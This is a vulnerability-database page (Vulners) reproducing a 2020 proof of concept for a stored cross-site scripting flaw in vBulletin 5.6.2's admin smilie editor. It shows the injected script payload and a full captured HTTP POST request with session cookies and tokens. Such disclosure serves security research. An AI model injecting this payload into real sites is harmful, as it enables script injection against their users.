Vulners
Lucene search
vBulletin 5.6.2 Persistent Cross Site Scripting Vulnerability
# Exploit Title: vBulletin 5.6.2 Stored XSS
# Date:15.08.2020
# Author: Vincent666 ibn Winnie
# Software Link: https://www.vbulletin.com/en/features/
# Tested on: Windows 10
# Web Browser: Mozilla Firefox
# Blog : https://pentest-vincent.blogspot.com/
# PoC: https://pentest-vincent.blogspot.com/2020/08/vbulletin-562-stored-xss.html
PoC:
Go to the Admin panel -> open Smilies -> Smilies manager->Edit Smilie
Categories->edit Smile:
https://72329406fb3a-041342.demo.vbulletin.net/admincp/index.php
https://72329406fb3a-041342.demo.vbulletin.net/admincp/image.php?do=edit&table=smilie&id=1&pp=20&page=1&imagecategoryid=4
Put our code in the field "Title" or "Text to Replace" and other fields.
Our code:
""><script>alert("field")</script><marquee>test</marquee>
And save this. We have a stored XSS and html code injection.
Picture:
https://imgur.com/a/JUsmPye
Video:
https://www.youtube.com/watch?v=D526ZLgH90Y&feature=youtu.be
https://72329406fb3a-041342.demo.vbulletin.net/admincp/image.php?do=update
Host: 72329406fb3a-041342.demo.vbulletin.net
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:70.0)
Gecko/20100101 Firefox/70.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: ru-RU,ru;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 399
Origin: https://72329406fb3a-041342.demo.vbulletin.net
Connection: keep-alive
Referer: https://72329406fb3a-041342.demo.vbulletin.net/admincp/image.php?do=edit&table=smilie&id=1&pp=20&page=1&imagecategoryid=4
Cookie: vb41342lastvisit=1597392323; vb41342lastactivity=1597521919;
vb41342np_notices_displayed=; vb41342contentlist_perpage=25;
vb41342sessionhash=845f579d01bdd42b4bf3020d4893f366;
PHPSESSID=d8cafaa942534428ce54ea2ba5a221ec7ed9532a6d9666b8;
BIGipServervbdemo-web_POOL=1459677194.20480.0000;
vb41342cpsession=18ca6bf5d79e5564ac2aa3a201612500;
vb41342sitebuilder_active=1
Upgrade-Insecure-Requests: 1
s=845f579d01bdd42b4bf3020d4893f366&do=update&adminhash=38c14dd475e4de2e3f95676226993ebd&securitytoken=1597523664-7fba45cf7add9630b2fda3e409ad0da7beec797c&title=Smile""><script>alert("field")</script><marquee>test</marquee>&smilietext=:)&imagespath=smile.png&imagecategoryid=4&displayorder=1&id=1&table=smilie&page=1&perpage=20&massmove=0&returnimagecategoryid=4
POST: HTTP/1.1 200 OK
Date: Sat, 15 Aug 2020 20:34:36 GMT
X-Frame-Options: sameorigin
Content-Security-Policy: frame-ancestors 'self'
Expires: 0
Cache-Control: private, post-check=0, pre-check=0, max-age=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Encoding: gzip
Connection: keep-alive, Keep-Alive
Keep-Alive: timeout=2, max=100
Transfer-Encoding: chunked
Content-Type: text/html; charset=UTF-8
p.s.
Today i haven't idea how to use this bug, because only the admin user
has an access to the admincp and can insert xss code in the fields.
# 0day.today [2020-08-18] #Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
18 Aug 2020 00:00Current
0.1Low risk
Vulners AI Score0.1